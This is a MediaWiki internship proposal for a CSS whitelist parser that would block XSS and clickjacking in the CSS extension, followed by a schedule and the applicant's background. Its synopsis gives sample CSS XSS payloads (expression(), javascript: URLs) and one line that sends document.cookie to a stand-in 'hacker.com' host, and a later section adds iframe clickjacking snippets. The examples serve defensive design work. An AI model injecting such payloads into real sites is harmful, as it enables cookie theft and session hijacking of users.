Jump to content

Preventing XSS Attacks through CSS Whitelisting

From mediawiki.org

Personal Details

[edit]
  • Name: Sakshi Bansal
  • Email: sakshi.april5@gmail.com
  • Other contact methods: gtalk, IRC, Skype
  • Location: Kerala, India
  • Timezone: GMT+5.30

Synopsis

[edit]
XSS attack in CSS
[edit]

Cross-site Scripting or XSS attacks is one of the most common attacks found in dynamic web page. A dynamic web page is that whose output depends on the parameters provided by the client or the user. These parameters can be provided by means of form fields etc. XSS is performed by embedding malicious code in this dynamic web page, hence when a client (the victim) access the page he will actually execute the malicious script in his machine. The use of XSS can be to gather private information, steal cookies, delete records from database etc.

As a little-known feature, some CSS implementations permit JavaScript code to be embedded in stylesheets. There are at least three ways to achieve this goal:

  • By using the expression(...) directive, which gives the ability to evaluate arbitrary JavaScript statements and use their value as a CSS parameter.
  • By using the url('javascript:...') directive on properties that support it.
  • By invoking browser-specific features.

Examples:

<style>

body{ margin-left:expression('alert(‘XSS’)') }

</style>

<DIV>

The <DIV> tag, similar to the <TABLE> and <TD> tags can also specify a background and therefore embed a script:

(a) <DIV STYLE = "background-image: url(javascript:alert('XSS'))">

(b) <DIV STYLE = "width: expression(alert('XSS'));">

(c) $colour = "expression(document.write('<iframe src=" .= "http://hacker.com?cookie=' + document.cookie.escape() + " />'))"; <DIV STYLE = "background:<?php echo $colour ?>;">

Current Scenario
[edit]

CSS extension provides a mechanism to provide CSS to individual code. This means that there is a high probability for injecting malicious code. The CSS extension provides checks against XSS. However the current implementation provides very crude checks. This means that a lot of valid CSS code is rejected. So it requires that there should be a better parser which provides better security and more accuracy. The aim of this project is to implement a better CSS parser which will reject all malicious code and accept all the legal code.

Implementation Overview
[edit]

1) PHP CSS

Parser A PHP parser is a PHP program written for CSS files. The parser is used for extracting a CSS file to a Data Structure. This Data Structure can then be tested for any security flaws. We can get parts of the code, analyze it and can be accordingly manipulated and will optimize the code.

There are various PHP CSS parsers’ available, but the one under consideration for this project is PHP_CSS_PARSER - https://github.com/sabberworm/PHP-CSS-Parser. The main purpose of this parser is to detect any malicious code injected via CSS and to prevent attacks like cross-site-scripting attacks, Clickjacking. It will discard any malicious CSS code and output the modified and secure CSS code.

2) Whitelist

Whitelist is a list of acceptable CSS properties that users can use. Eg., color, font-family, background etc. Basically it will prune out anything which is not standard CSS code. Each row in a whitelist consists of a key and a value. Keys are the allowed selectors like (HTML element name, HTML attribute name, or CSS property name). The value is the possible values that the selector can take. The value can be specified as a regular expression, code refs, hash refs. Every CSS property is checked against the whitelist rules. If there is no match then that CSS property is discarded. If the key (selector) matches then we check if the value is a permitted value.

Once we have selected the parser to be used, designed the whitelist, we need to integrate this to the original CSS extension. This can be done by adding the former as a git submodule to the CSS extension.

3) UI Redress attacks

User Interface Redress attacks is a vulnerability which arises due to browser security. Here a user (victim) is tricked into clicking on something which seems normal or secure like a link or a button, but is actually a hidden security threat. When the user clicks the button, instead of the normal action being performed it will actually execute a malicious script which may pose various security threats like stealing cookies, taking control of the victim’s machine, enabling the web-cam etc.

Some of the ways in which UI Redress attacks can be done using CSS:

Example:1

<iframe id="file1" src="file1.html"

width ="2005" height="290" scrolling="no"

frameborder="none"></iframe>

<style type="text/css">

<!-- #inner { position: absolute; left: -1955px; top: -14px;}

//--></style>

Example:2

</div>

<iframe src="dragAndDropIframe.html"

style="border:1px solid;" frameborder="yes">

</iframe>

It is evident that UI Redress attacks can happen via injection malicious code into CSS.
Hence I would also be adding rules to reject these injections.
This can be done by adding additional functionalities in the whitelist script to avoid UI Redress attack
[[Image:FOSS_Project.png|centre]]

Schedule of Deliverables

[edit]
May 19th - May 22nd Hang around the IRC and learn more about the project

Find, review and test various PHP CSS parser implementations.

May 23rd - June 8th Implement a standalone CSS XSS whitelist script with the chosen PHP CSS parser.
June 9th - June 15th Merge the whitelist functionality into the CSS Extension.
June 16th - June 22nd Write test cases to ensure that XSS attacks and undesirable CSS code are removed.
June 23rd - June 30th Improvise on the whitelist script to make it more general, modular, easier to read and add new whitelist functionality.
July 1st - July 8th Remove unnecessary code and document the code.
July 9th - July 20th Write whitelist script for preventing redress attack and and integrate with the original whitelist script.
July 21st - July 31st Write test cases, finding bugs and fixing them.
Aug 1st - Aug 11th Clean up the code and complete the remaining documentation.

Work/Internship Experience

[edit]

Implemented TCP stack in C language - Master’s Level assignment from Vrije University, Amsterdam - https://bitbucket.org/sakshi_b/tcp_stack/src

I am a part of the University team - bi0s. My team participates in various National and International level Capture The Flag(CTF) Ethical Hacking Contests. We have been consistently performing well and had secured 1st position in India and 72nd position out of more than 639 teams that had participated for CSAW CTF 2012. In my team I am in-charge of the web-services. Participating in these ethical hacking contests has improved my learning curve. I am well aware of various attacks, exploits and the how to prevent some of these attacks.

As a project out of personal interest for web development I have developed a project On -line Banking. Here I implemented both the front-end using HTML, JavaScript, PHP and a back-end using MySQL for the application - https://bitbucket.org/sakshi_b/online-banking-application I have implemented Access Control List (ACL) library using Java servlets.

Participation

[edit]

I am a punctual person and always complete my work on time. I would follow the time line that I have developed, so that I am always completing my work on time. I would also report the completion of my work to my mentor and also keep an update about it on my user page so that the developers would know about the progress of the project. For any help required I would try to search, ask at IRC and discuss with my mentor.

Since I am a final year student all my university examinations are over and I have completed my final year project so I have no other commitments apart from the GNOME project. Hence I can easily be available during the internship period- May 19th and August 11th for a full-time internship, 40h/week.

Past open source experience

[edit]

I have fixed the following bugs in Thunderbird:

Bug 581470 - Ctrl+P and Ctrl+W not working from Print Preview window

Bug 708550 - Cannot copy version string from "About Thunderbird" dialogue window

Bug 507103 - Composition's "Save" button remembers last "Save as" choice (draft, template, or file), but no indication of current choice in drop down menu (menu items should be type="radio")

Bug 325777 - "Search messages" window has mislabeled button - "File" should be "Move"

Bug 465351 - Wrong message and reason reported with untrusted CA roots when signing email

Reported bugs:

Bug 866498 - Radio group for Main Menu Bar->View->Feed Message Body As-> and Radio group for App Menu-> View->Feed message Body As-> are not in sync with each other.

I have fixed bugs in Thunderbird in a short time span, which shows that I am a fast learner. I greatly improved my communication skills after constantly being on the IRC and asking questions on the project idea and various bugs.

Why FOSS

[edit]

According to the Principles of Security, Security through Obscurity is not a very good technique since there can be lot of bugs and security flaws. However if the source code is available public-ally (FOSS), a large number of people can analyze the code and find bugs, security flaws. This directly improves the quality of the products. Also since people can download the source code, they can also modify the code to suit their needs. Again this implies that the products developed under FOSS are more user-friendly and user-centric. Open Source Contribution gives an opportunity to users to help develop their favorite products. The contribution ranges from simple bug fixes to adding new modules. This also means that the better versions of the products are available faster than otherwise.